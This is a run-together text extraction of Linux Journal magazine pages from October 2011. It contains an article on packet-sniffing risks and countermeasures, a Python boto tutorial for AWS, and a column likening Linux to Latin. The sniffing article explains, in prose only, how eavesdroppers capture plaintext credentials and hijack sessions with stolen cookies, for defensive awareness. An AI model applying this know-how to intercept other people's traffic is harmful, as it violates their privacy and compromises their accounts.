INDEPTHPacket SniffingBasicsYour data isn’t safe on public networks. You may not even realizethe extent to which that statement is true. ADRIAN HANNAHImagine this: you’re sitting in your localcoffee shop sucking down your morningcaffeine fix before heading into the office.You catch up on your work e-mail, you checkFacebook and you upload that financialreport to your company’s FTP server. Overall,it’s been a constructive morning. By thetime you get to work, there’s a whirlwind ofchaos throughout the office. That incrediblysensitive financial report you uploaded wassomehow leaked to the public, and your bossis outraged by the crass and unprofessionale-mail you just sent him. Was there somehacker lurking in the shadows that brokeinto your company’s network and decided tolay the blame on you? More than likely not.This mischievous ne’er-do-well probably wassitting in the coffee shop you stopped at andseized the opportunity.Without some form of countermeasures,your data isn’t safe on public networks. Thisexample is a worst-case scenario on thefar end of the spectrum, but it isn’t so farfetched.There are people out there whoare capable of stealing your data. The bestdefense is to know what you can lose, how itcan get lost and how to defend against it.What Is Packet Sniffing?Packet sniffing, or packet analysis, is theprocess of capturing any data passed overthe local network and looking for anyinformation that may be useful. Most ofthe time, we system administrators usepacket sniffing to troubleshoot networkproblems (like finding out why traffic is soslow in one part of the network) or to detectintrusions or compromised workstations (likea workstation that is connected to a remotemachine on port 6667 continuously whenyou don’t use IRC clients), and that is whatthis type of analysis originally was designedfor. But, that didn’t stop people from findingFigure 1. A Capture of a Packet of SomeoneTrying to Log In to a Web Site104 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHFigure 2. Tools like NetworkMiner can reconstruct images that have been broadcast on the network.more creative ways to use these tools. Thefocus quickly moved away from its originalintent—so much so that packet sniffers areconsidered security tools instead of networktools now.Finding out what someone on yournetwork is doing on the Internet is not somearcane and mystifying talent anymore. Toolslike Wireshark, Ettercap or NetworkMinergive anybody the ability to sniff networktraffic with a little practice or training.These tools have become increasingly easyto use and continue to make things easierto comprehend, which makes them moreusable by a broader user base.How Does It Work?Now, you know that these tools are outthere, but how exactly do they work? First,packet sniffing is a passive technique. Noone actually is attacking your computerand delving through all those files that youdon’t want anyone to access. It’s a lot likeeavesdropping. My computer is just listeningin on the conversation that your computer ishaving with the gateway.Typically, when people think of networktraffic, they think that it goes directly fromtheir computers to the router or switchand up to the gateway and then out tothe Internet, where it routes similarly untilit gets to the specified destination. This ismostly true except for one fundamentaldetail. Your computer isn’t directly sendingthe data anywhere. It broadcasts the datain packets that have the destination in theheader. Every node on your network (orswitch) receives the packet, determinesWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 105


INDEPTHThe most devastating data, and the stuffmost people are concerned with, is usercredentials.whether it is the intended recipient andthen either accepts the packet or ignores it.For example, let’s say you’re loading theWeb page http://example.com on yourcomputer “PC”. Your computer sendsthe request by basically shouting “Hey!Somebody get me http://example.com!”,which most nodes simply will ignore.Your switch will pass it on to where iteventually will be received by example.com,which will pass back its index page to therouter, which then shouts “Hey! I havehttp://example.com for PC!”, which againwill be ignored by everyone except you. Ifothers were on your switch with a packetsniffer, they’d receive all that traffic and beable to look at it.Picture it like having a conversation ina bar. You can have a conversation withsomeone about anything, but other peopleare around who potentially can eavesdropon that conversation, and although youthought the conversation was private,eavesdroppers can make use of thatinformation in any way they see fit.What Kind of Information Can BeGathered?Most of the Internet runs in plain text, whichmeans that most of the information you lookat is viewable by someone with a packetsniffer. This information ranges from thebenign to the sensitive. You should take notethat all of this data is vulnerable only throughan unencrypted connection, so if the site youare using has some form of encryption likeSSL, your data is less vulnerable.The most devastating data, and the stuffmost people are concerned with, is usercredentials. Your user name and passwordfor any given site are passed in the clearfor anyone to gather. This can be especiallycrippling if you use the same password forall your accounts on-line. It doesn’t matterhow secure your bank Web site is if youuse the same password for that accountand for your Twitter account. Further,if you type your credit-card informationinto an unsecure Web page, it is just asvulnerable, although there aren’t many (ifany) sites that continue this practice forthat exact reason.There is a technique in the securityworld called session hijacking where anattacker uses a packet sniffer to gainaccess to a victim’s session on a particularWeb site by stealing the victim’s sessioncookie for that site. For instance, say Iwas sniffing traffic on the network, andyou logged in to Facebook and left theRemember Me On This Computer checkbox checked. That signals Facebook to send106 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHCARNIVORECarnivore was a systemimplemented by the FederalBureau of Investigation thatwas designed to monitor e-mailand electronic communications.It used a customizable packetsniffer that can monitor all ofa target user’s Internet traffic.Figure 3. A Firefox Extension Designed to GatherUnencrypted Session Cookies from the Networkyou a session cookie that your browserstores. I potentially could collect thatcookie through packet sniffing, add it tomy browser and then have access to yourFacebook account. This is such a trivial taskthat it can be scripted easily (someone evenhas made a Firefox extension that will do itautomatically), and there still aren’t manyWeb sites that encrypt their traffic to theend user, making it a significant problemwhen using the public Internet.Packet sniffers exist that are specificallydesigned for monitoring what you are upto on the Internet. They will rebuild theexact Web page you are looking at, photosyou’re browsing, videos you’re watching,and even files you’re downloading. Theseapplications are tailored to look througha string of packet captures to find variouspacket streams and reassemble them on thefly. My roommate in college whipped upsomething that would display the contentsof my browser in real time on his computer(a scary revelation indeed).E-mail is another one of those thingsthat people tend to get up in arms aboutbecause there’s an assumption of privacyin e-mail that is derived from the regularmail system. Your e-mail is sent out andviewable, just like anything else thatemanates from your computer of thenetwork. E-mail sniffing is what made theFBI’s Carnivore program so infamous.Since every packet bears a destinationaddress in its header, it’s possible that someonecould sniff the network just to gathera browsing history of everyone on that segment.This may not be very insidious, but it’sgathered data, and there’s always someonewilling to pay for all sorts of data.PrecautionsI’m sure you’re currently secondsWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 107


INDEPTHNone of these precautions is the magic curefor eavesdroppers, but using even one ofthem will make you a less-desirable target.from taking a pair of scissors to yournetwork cable and swearing off theInternet for life, but fear not! There areless-drastic measures you can take toprevent such sensitive data loss. None ofthese precautions is the magic cure foreavesdroppers, but using even one ofthem will make you a less-desirable target.There’s an old joke that says that whenyou’re being chased by a bear, you don’tneed to outrun the bear, just the guy infront of you. You don’t have to have themost secure computer on the block, justmore secure than somebody else’s. As withmost network security, if people really wantyour data, they can get at it. However, mostof the time, attackers aren’t targeting aspecific person, they’re looking for targetsof opportunity, so the more secure you are,the less likely you are to be such a target.The first defense against eavesdroppingis the Secure Socket Layer (SSL) used bymost Web pages that handle sensitiveinformation. This forces all the contentshared back and forth between you andthe site to be encrypted. Some sites useSSL for their login pages only. Most sitesdon’t even use SSL at all. It’s easy to tell—the URL in the address bar will start withhttps instead of http. Some sites offer yousome choice in the matter. For instance,Google allows you to turn SSL on all thetime within Gmail, thus encrypting all youre-mail traffic.Modern network switches are designedto pass data intelligently to avoid packetcollisions and excessive network traffic. If apacket is broadcast that is not intended forone of the nodes attached to it, the routerwill not rebroadcast to the local nodes.Likewise, if a packet is broadcast locallythat is intended for another local node, theswitch will not rebroadcast to the outsidenetwork. This forces strict segmentation ona network. For us, this means that someoneusing a packet sniffer on a switched networkwill not see any traffic from hosts notattached to the same switch. This doesn’tmean much on small-scale networks, likeyou have at your house, but on a largerscale, it means that somebody can’t sit inthe breakroom sniffing traffic three floors upfrom the accounting department.Wireless network encryption has come along way in its short lifespan—going fromno encryption to Wired Equivalent Privacy(WEP) encryption to Wi-Fi Protected Access(WPA) encryption. Wireless networks don’tprovide the same segmentation that thepreviously mentioned switches provide,meaning that any packet transmitted on awireless access point gets rebroadcast to108 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHeveryone else on the access point. Eventhough your traffic is encrypted underWEP, this encryption protects only thedata from users not connected to thatwireless network. The encryption schemeand key are identical for all users, so allyour “encrypted” data is decryptable byanyone on the network, making your dataessentially unencrypted. WPA solves thisissue by isolating all users on the networkand giving them a different encryptionscheme even when the key is the same.If you have SSH access to a computeroutside your current network (which I’msure most of us do), you can tunnel allyour traffic through an SSH connection.You essentially are using the encryptionof the SSH connection to protect all yourdata from eavesdroppers. There are twoapparent downsides to this technique.First, you’re connection speed will drop,because now instead of going from youto the destination and back, your trafficwill go from you to the SSH server to thedestination and back. Second, your data istransmitted unencrypted from the remoteend, so if that machine is vulnerable topacket sniffing, your data is no safer than itwas at your local machine.Virtual private networks are intendedto allow users access to a network thatotherwise would be inaccessible. However,they also can be used to protect your traffic,because VPN connections are encrypted.You can set up a private VPN for yourselfjust for this purpose, but it will have thesame disadvantages as SSH tunneling. Ifyou work for a company that has a VPN,you may be allowed to use it for thispurpose, but your traffic will fall under thesame policy and rules that you have in youroffice, so be careful what you use it for.■Adrian Hannah is a self-proclaimed hacker with a penchant forprivacy-minded political issues. He has worked as a systemadministrator in one capacity or another for more than ten yearsand has a strong computer science background founded in hisearly childhood. He is a biker (with no bike), a martial artist(with no dojo), a TV junkie (with no cable), a rebel (without acause) and a horse (with no name). You can reach him on Twitter(@codemonkey2841).WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 109


INDEPTHPython in theCloudA basic introduction to using the Python boto library to interactwith AWS services and resources. ADRIAN KLAVERThis article explores using the boto libraryto work with resources in the Amazon WebServices (AWS) cloud. For those wondering,the boto name refers to a species offreshwater dolphin found in the Amazonriver. boto is maintained by Mitch Garnaatwho works on the Eucalyptus team atCanonical. The library covers many, thoughnot all, services offered by AWS (see theboto Web site for a current listing).But, before I start on the use and careof boto, let me take a little diversion. Itprobably goes without saying, but you needto set up an AWS account if you want toplay along. If you already have an Amazonaccount, you just need to register withAmazon at the AWS site (see Resources) toset up your AWS account. Otherwise, youneed to set up an Amazon account first.As part of the setup for your AWS account,you will be issued some credentials (you willbe using those later). Note, if you are a newuser to AWS, check out the free tier offer(see Resources). This allows you to kick thetires at no charge for the most part. For thisarticle, I try to stick to the offer restrictionsas much as possible.With the AWS setup out of the way, let’smove on to installing boto. At the time ofthis writing, the current version is 2.0b4,which is what I use in this article. botois available from the Python PackageIndex (PyPi), and you can install it witheasy_install boto. Remember, if youwant it to be a system-wide library, do theprevious as a superuser. You also can go toeither PyPi or the boto site and download atarball, and then do a Python setup.py install.The PyPi site has the latest version only; theboto site has a variety of versions available.Now that the housekeeping’s done, it’stime to play. As mentioned above, botoallows you to access many of the AWSservices—in fact, many more than I havespace to cover here. This article covers theAmazon Machine Image (AMI), Elastic BlockStore (EBS), Elastic Compute Cloud (EC2),Simple Storage Service (S3) and SimpleNotification Service (SNS). Where an AMI isa virtual machine, an EBS is a virtual harddrive, EC2 is the cloud you run an AMI/EBScombo in, S3 is key/object storage, andSNS is a messaging system from the cloud.In all these cases, account information is110 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHneeded for boto to access AWS. You’ll needthe AWS AccessKey and the AWS SecretAccess Key. They were created when yousigned up, but if you did not record them,don’t fret. They are available in your AWSaccount page as Security Credentials.To make things easier and more secure,there are options to include the informationin the connection string. The first optionis to create the AWS_ACCESS_KEY_ID andAWS_SECRET_ACCESS_KEY ENV variablesand set them equal to the respective keys.The other option is to create a .boto file inyour home directory, and using ini style, setthe keys (Listing 1).Before going further, I should point outthat AWS has a Web-based managementtool for most of its services. It is calledthe AWS Management Console, and youcan reach it by going to the AWS site andclicking on the Account tab at the top ofthe page (I make reference to and use thistool for some of what is to follow). Themanagement console also is handy forconfirming that the boto code actually isdoing what it is supposed to be doing. Justremember to click the Refresh button at thetop of the Console when in doubt.Listing 1. boto Configuration File#.boto file format[Credentials]aws_access_key_id = aws_secret_access_key = What follows is a basic look at the interactionbetween boto and AWS. The codeis kept simple both to conserve space andillustrate basic principles. To get started, Ineed to create an AMI of my own to workwith. The easiest way to do that is to graban existing public image and make it private.I use the Ubuntu images maintainedby Canonical for my own use. The bestplace to find what is available is the Alesticsite (see Resources). It has a handy tablelabeled “Ubuntu and Debian AMIs forAmazon EC2” with tabs for the AWSregions. Click on the region you want, andthen select the appropriate image. For thisarticle, I selected the Ubuntu 10.04 LTS64-bit EBS AMI in the US-East-1 region withan AMI ID of ami-2ec83147 (the ID maybe different as new images are built, seethe EBS/S3 AMI Sidebar). Clicking on thearrow next to the image takes me to theAWS Management Console (after login) tostart an instance from the image.To make use of the free tier, I selectedthe micro instance. At this point, thereis an instance of a public image runningon my account. To make a private image,I could use the management consoleby right-clicking on the instance andselecting Create Image, but where is thefun in that? Let’s use boto to do it instead(Listing 2). It’s simple. Import the botoconvenience function connect_ec2, andnote the lack of access credentials in theconnection code. In this case, they are ina .boto file in my home directory. Then,I use create_image() to create andWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 111


INDEPTHEBS vs. S3 AMIHere’s some enlightenment on the differences between an EBS-backed and anS3-backed AMI. S3 AMIs were the rule when AWS first started. They stored theimage root device as a series of data chunks in the AWS S3 storage service.S3-backed AMIs also are referred to as instance store AMIs. Later, EBS-backedAMIs were made available. These store the root device as an EBS volume. Thishas some practical considerations, such as the following:■ Maximum root device size of the S3 is 10GiB and of the EBS is 1TiB.■ The boot time is faster with EBS, because the root device does not have tobe assembled first.■ Stop: EBS AMI instances have the ability to be stopped, which is roughlyequivalent to a paused state, in addition to being terminated. S3-backedinstances only can be terminated.For a more-detailed comparison, see the URL listed in the Resources for this article.register a private AMI using the runninginstance (i-c1315eaf), launched from themanagement console, with the namelj_test. The create_image function returnsthe AMI ID—in this case, ami-7eb54d17.The next step is to put the image touse by launching an instance or instancesof it. For this, see the line in Listing 2with con.run_instances(). The AMIpreviously created is used as the templatefor the instances.The min_count and max_countparameters need some explaining. AWS hasa default limit of 20 instances that can berunning per region (this can be increasedby filling out a request form) per account.This is where the min/max count comes intoplay. If I already had 18 instances running ina region and I set the min_count at 2 andthe max_count at 5, two new instanceswill be launched.The key name is an SSH keypairgenerated by Amazon that is used forSSH access to the instance(s).The instance_type is set to the EC2micro instance, and it is slotted to run inthe us-east-1d availability zone by theplacement parameter. Let’s take a brief sidetrip on AWS availability zones. Availabilityzones are relative to your account. In other112 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHwords, my us-east-1d may not representthe same physical availability zone as yourus-east-1d.The final parameter disable_api_termination=True is a lock-outmechanism. It prevents the termination ofan instance using API termination calls. Aninstance with this protection in force has tohave that parameter first changed to Falseand then have a termination commandgiven in order for it to go away. See themodify_instance_attribute() linefor how to undo the termination protectionon a running instance.Assuming a successful launch,run_instances() will return a botoreservation class that represents thereservation created by AWS. This classthen can be used to find the instancesthat are running, assuming it wascaptured and iterated over right then.A more generic approach is to use theget_all_instances() function toreturn a list of reservation classes thatmatch the criteria given. In Listing 2, I usethe filter parameter to limit my search ofinstances to those created from the AMIcreated above and that are actually running.So, where do you find what filtersare available? The boto documentationdoes not list the filters, but insteadpoints you at the source, which is theAWS developer documentation for eachresource (see Resources). Drilling downin that documentation gets you to an APIReference where the options to the variousactions are spelled out. For this particularcase, the information is in the EC2 API (seeResources) under Actions/DescribeImages.There is not a complete one-to-oneSecuritySecurity, as always, is an important issue when discussing a server that is on theInternet. The standard procedures apply to EC2 instances as to regular servers. Forthose, see Mick Bauer’s Paranoid Penguin column in previous issues of LJ, as wellas any number of security references.However, there is a special case related to AMIs that deserves mention. Asdemonstrated in this article, it is possible to take a publicly available AMI imageand make it your own private image. This presents some special problems; see theSecurity URL in the Resources section. Before you create a production instance, itwould be prudent to read that information and take it to heart. For the other side ofthe coin, consult the Alestic blog (see Resources) for how to create a secure AMI toshare with others that does not leak out your private information.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 113


INDEPTHListing 2. Using boto#!/usr/bin/env python# -*- coding: utf-8 -*-import timefrom boto import connect_ec2, connect_sns# Create private imagecon = connect_ec2()con.create_image("i-c1315eaf", "lj_test")# Launch/run instance(s)reserv = con.run_instances("ami-7eb54d17",min_count=2, max_count=5, key_name='laptop',instance_type="t1.micro",placement="us-east-1d",disable_api_termination=True)# Disable termination protectioncon.modify_instance_attribute("i-132e457d","disableApiTermination", False)# Find running instancesres_list = con.get_all_instances(filters={"image-id": "ami-7eb54d17","instance-state-name": "running"})# Find instance informationfor reservation in res_list:inst_list = reservation.instancesfor instance in inst_list:instance.id, instance.state# See Figure 1 for output.# Create a tagcon.create_tags(["i-391c2657"],{"Name": "lj_instance"})con.create_tags(["vol-a9590ac2"],{"Name": "lj_volume"})# Get volumevol = con.get_all_volumes(filters={"tag:Name": "lj_volume"})[0]# Create snapshotsnap = vol.create_snapshot(vol.tags["Name"]\+ "Snap")# Monitor snapshot creation and notify on completiondef check_snapshot(snap):while snap.status != "completed":print "Sleeping"time.sleep(30)snap.update()g_time = time.gmtime()msg_str = "Snapshot " + snap.id + "\n"msg_str += "of volume " + snap.volume_id + "\n"msg_str += "started at time "msg_str += snap.start_time + "\n"msg_str += "completed at "msg_str += time.asctime(g_time)ARN = "arn:aws:sns:us-east-1:213825411462:Lj"sns_con = connect_sns()sns_con.publish(ARN, msg_str, "Snapshot done")print msg_str114 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


Figure 1. EC2 Instance Informationcorrespondence between the boto functionnames and the AWS API names, but it isclose enough to figure out.Having run the function, I now have alist of reservations. Using this list, I iteratethrough the reservation classes in the list,which yields an instance list that containsinstance classes. This, in turn, is iteratedover, and various instance attributes arepulled out (Figure 1).Having created an AMI and launchedinstances using that image, now what?How about backing up the informationcontained in the instance? AWS has afeature whereby it is possible to createa snapshot of an EBS volume. What isnice about this is that the snapshots areincremental in nature. Take a snapshoton day one, and it represents the state ofthe volume at that time. Take a snapshotthe next day, and it represents onlythe differences between the two days.Furthermore, snapshots, even though theyrepresent an EBS volume, are stored asS3 data. The plus to this is that althoughmonthly charges for EBS are based on thesize of the volume, space used or not, S3charges are based on actual space used. So,if you have an EBS volume of 40GB, you are


INDEPTHcharged 40GB/month. Assuming only halfof that is used, the snapshot will accruecharges of roughly 20GB/month. The finalfeature of a snapshot is that it is possibleto create an EBS volume from it that, inturn, can be used to create a new AMI. Thismakes it relatively easy to return to somepoint in the past.To make the snapshot procedure easier,I will create a tag on the instance that hasthe EBS volume I want to snapshot, as wellas the volume itself. AWS supports userdefinedtags on many of its resources. Thecreate_tags() function is a genericone that applies a tag to the requestedresource(s). The first parameter is a list ofresource IDs; the second is a dictionarywhere the tag name is the key and thetag value is the dictionary value. Knowingthe Name tag for the instance, I useget_all_volumes() with a filter toretrieve a volume class. I then use the volumeclass to create the snapshot, giving thesnapshot a Description equal to the volumeName tag plus the string Snap. Thoughthe create_snapshot() will return asnapshot ID fairly quickly, the snapshot maynot finish processing for some time. This iswhere the SNS service comes in handy.SNS is exactly that, a simple way of sendingout notifications. The notifications can go outas e-mail, e-mail in JSON format, HTTP/HTTPSor to the AWS Simple Queue Service (SQS). Idon’t cover SQS in depth here; just know it isa more robust and featured way of sendingmessages from AWS.The first step is to set up a notificationtopic. The easiest way is to use the SNStab in the AWS management console. Atopic is just an identifier for a particularnotification. Once a topic is created,subscriptions can be tied to the topic. Thesubscriptions do not take effect until theyare confirmed. In the case of subscriptionsgoing to e-mail (what I use here), aconfirmation e-mail is sent out with aconfirmation link. Once the subscription isconfirmed, it is available for use.As I alluded to earlier, I demonstratemonitoring the snapshot creation processwith a notification upon completion (Listing2). The function check_snapshot()takes a snapshot class returned bycreate_snapshot and checks in onits progress at regular intervals. Note thesnap.update(). The AWS API is Webbasedand does not maintain a persistentconnection. Unless the snapshot returnsa status of “completed” immediately, thewhile loop will run forever without theupdate() method to refresh the status.Once the snapshot is completed, amessage is constructed using the snapattributes. The message then is publishedto the SNS topic, which triggers thesubscription to be run, and an e-mailshould show up shortly. The ARN shownstands for Amazon Resource Name. It iscreated when the SNS topic is set up andrepresents the system address for the topic.Note that the simple part of SNS is thatthere is no delivery confirmation. The AWSAPI will throw an error if it can’t do its part(send the message), but receiving errors are116 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


not covered. That’s why one of the sendingoptions for SNS is SQS. SQS will hold amessage and resend a message for eithera certain time period or until it receivesconfirmation of receipt and a deleterequest, whichever comes first.So, there you have it—a basic introductionto using the Python boto library to interactwith AWS services and resources. Needlessto say, this barely scratches the surface.For more information and to keepcurrent, I recommend the blog at theAlestic site for general AWS informationand Mitch Garnaat’s blog for boto andAWS information.■Adrian Klaver (adrian.klaver@gmail.com), having found Python,is on a never-ending quest to explore just how far it can take him.Advertiser IndexCHECK OUT OUR BUYER’S GUIDE ON-LINE.Go to www.linuxjournal.com/buyersguide where you can learnmore about our advertisers or link directly to their Web sites.Thank you as always for supporting our advertisers by buyingtheir products!ADVERTISER URL PAGE #ADVANCED CLUSTERING TECHNOLOGIES www.advancedclustering.com 31EMAC, INC. www.emacinc.com 11, 33FSCONS fscons.org 53HIGH PERFORMANCE COMPUTING www.flaggmgmt.com/hpc 61IXSYSTEMS, INC. www.ixsystems.com 7LOGIC SUPPLY, INC. www.logicsupply.com 51, 109LULLABOT doitwithdrupal.com 2, 71MICROWAY, INC. www.microway.com 3, 84, 85OEM PRODUCTION www.oemproduction.com 59Resourcesboto Web Site: code.google.com/p/botoWhat is a boto?www.acsonline.org/factpack/Boto.htmboto Documentation: boto.cloudhackers.comboto Blog: www.elastician.comAWS Web Site: aws.amazon.comUsing Public AMIs: aws.amazon.com/articles/0155828273219400Creating Secure AMIs:alestic.com/<strong>2011</strong>/06/ec2-ami-securityEBS vs. S3: docs.amazonwebservices.com/AWSEC2/latest/UserGuide/Concepts_BootFromEBS.htmlAWS Free Tier: aws.amazon.com/freeAWS Developer Documentation: aws.amazon.com/documentationEC2 API: docs.amazonwebservices.com/AWSEC2/latest/APIReferenceAlestic: alestic.comPOLYWELL COMPUTERS, INC. www.polywell.com 57RACKMOUNTPRO www.rackmountpro.com 39SILICON MECHANICS www.siliconmechanics.com 21TECHNOLOGIC SYSTEMS www.embeddedx86.com 23USENIX ASSOCIATION www.usenix.org/lisa11/lj 35ZENDCON zendcon.com 41ATTENTION ADVERTISERSThe <strong>Linux</strong> <strong>Journal</strong> brand’s following hasgrown to a monthly readership nearly onemillion strong. Encompassing the magazine,Web site, newsletters and much more,<strong>Linux</strong> <strong>Journal</strong> offers the ideal contentenvironment to help you reach your marketingobjectives. For more information, pleasevisit www.linuxjournal.com/advertising.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 117


EOF<strong>Linux</strong> Is LatinDOC SEARLSWorld Domination is still arriving, but it’s not thanksto anybody’s empire. DOC SEARLSRome — Latin isn’t the first Westernlanguage; it’s just the first tobecome a de facto standard. It’s astandard that still exists, or I wouldn’t haveused “de facto” in the last sentence. Norwould I feel free to leverage Latinate termsin English, which is just one of Latin’smany twisted forks.My first suspicion that <strong>Linux</strong> was Latindidn’t arrive here in Rome, but in a car lastweek in North Carolina. I was driving upthe interstate, somewhere between Grahamand Haw River, when I saw a billboard for acompany that needed <strong>Linux</strong> programmers.Thus, it occurred to me, on the spot, that<strong>Linux</strong> was becoming the lingua franca ofbig-business IT development.True, <strong>Linux</strong> isn’t a language in theliteral sense, but it is becoming necessaryto know <strong>Linux</strong> if you are going to getalong in IT, just as you needed to knowLatin if you were going to get alongin the Roman Empire and its sphere ofinfluence—for a millennium and a halffollowing the time of Caesar.Latin was inherited by Rome and itsempire from the Latins, a tribe thatinhabited Latium, the fertile lands drainedby the Tiber along the river’s south side.Latin itself was a branch of Italic, whichwas a branch of Proto-Indo-European,which is now used even less than Multics,which we might call Proto-UNIX. And, thus,we arrive at Latin as a metaphor for <strong>Linux</strong>.For Latin, World Domination is stillgoing on, because it is embodied indozens of languages, as well as countlesssciences, art, literature and everything elsepeople teach in school. For <strong>Linux</strong>, WorldDomination is still starting.Like Latin, <strong>Linux</strong> has roots. Thoseare mostly in UNIX, which also persiststhrough variants like HP/UX, AIX, Solarisand the BSDs. But <strong>Linux</strong> is now the One118 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


EOFThat Matters. It is, by far, the world’s mostcommon, easily used and free (as in bothbeer and speech) OS. And, it didn’t requirean empire to arrive at that state.In that sense, it also bears anotherresemblance to Latin, because whatremains of ancient Rome offers lessevidence of empire than of engineering.Romans may not have invented everythingthey spread, but they did create andmaintain a system of respect for invention,in the form of writing. They kept recordsof everything they could. While Rome didmuch (or all) to give us paved roads, dams,aqueducts, water-distribution systems,public baths, blown glass, cranes, elevators,stadiums and building designs and methodsof many kinds, the reason was not just thatan empire spread those things. Rome alsoneeded engineers, skilled craftspeople,and a spoken and written language tocommunicate How Things Are Done.My favorite example is the Pantheon,which for 1,700 years has held the recordfor the world’s largest un-reinforcedconcrete dome. Look up at the roof frominside, and you see the shapes of the formsinto which mixed concrete was pounded(it wasn’t poured). There isn’t a crackanywhere in the whole thing.We know how the Romans made thatconcrete because they commented ontheir methods in writing. All their buildingmethods were debugged, patched andimproved in ways that are echoed in howwe make, improve and communicate aboutcode today. That’s one reason the Romans’innovations were easily shared and spread.Having an empire helped, but that was aninsufficient condition. They also neededwriting and speech that everyone couldunderstand and put to use and re-use.I’d like to say the same about coffee,which came to the world from Ethiopiaby way of Venice. By acclaim, two of thebest coffees you can drink are found onlyat Sant’Eusatachio and Tazzo d’Oro, bothwithin a stone’s throw of the Pantheon.Neither shares their secrets, which areclosely guarded and highly proprietary—asonce was AT&T’s UNIX.I love the coffee I’ve enjoyed repeatedlyat both places. But I can make espressos,cappuccinos and macchiatos at hometoo, on my own Italian machine, usingcoffee roasts of all kinds. And, frankly, Ilike my own coffee creations just as well,if not better, than these Roman originals,especially when I get them right. Those twoplaces may have set the original standard,but coffee, like language and code, is aliving thing that nobody owns, everybodycan use and anybody can improve.I can’t guess how long <strong>Linux</strong> will prove tobe the same, but its age is clearly upon us.■Doc Searls is Senior Editor of <strong>Linux</strong> <strong>Journal</strong>. He is also afellow with the Berkman Center for Internet and Society atHarvard University and the Center for Information Technologyand Society at UC Santa Barbara.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 119

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!